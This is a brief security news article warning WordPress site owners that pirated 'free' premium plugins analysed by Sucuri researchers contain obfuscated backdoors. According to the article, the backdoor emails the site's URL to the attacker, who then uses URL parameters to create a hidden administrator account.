If you run a WordPress site, and are trying to make some money through it, think twice before installing “free” versions of premium plugins.
Researchers from Sucuri have recently analyzed a couple of third-party websites offering such versions for download, and have discovered more than one plugin equipped with malicious code aimed at hijacking any WP site on which they are installed.
The lure is actually quite clever – it is well known that some people are simply never going to pay for software they think they can get for free. But, unfortunately, they might end up paying another kind of price later on.
What motivated the researchers to do a more in-depth investigatio in the matter was finding a “free” SEOPressor plugin installed on a severely infected site they were tasked with cleaning.
After analyzing the plugin’s obfuscated code, they discovered lines of code that notifies the developer who modified it of the URL of the site in question via email. The attacker then visits the site and adds specific parameters in the URL that allow the creation of a new admin user (with a specific password known to the attacker).
“The attacker can now log into WordPress with admin permissions and do whatever he wants with the blog, with the whole site (e.g. injecting a backdoor to some theme or plugin, and then using it to upload malicious files to the server), with the server account (all sites that share the same account can be easily compromised now) and even with the whole server,” the researchers note.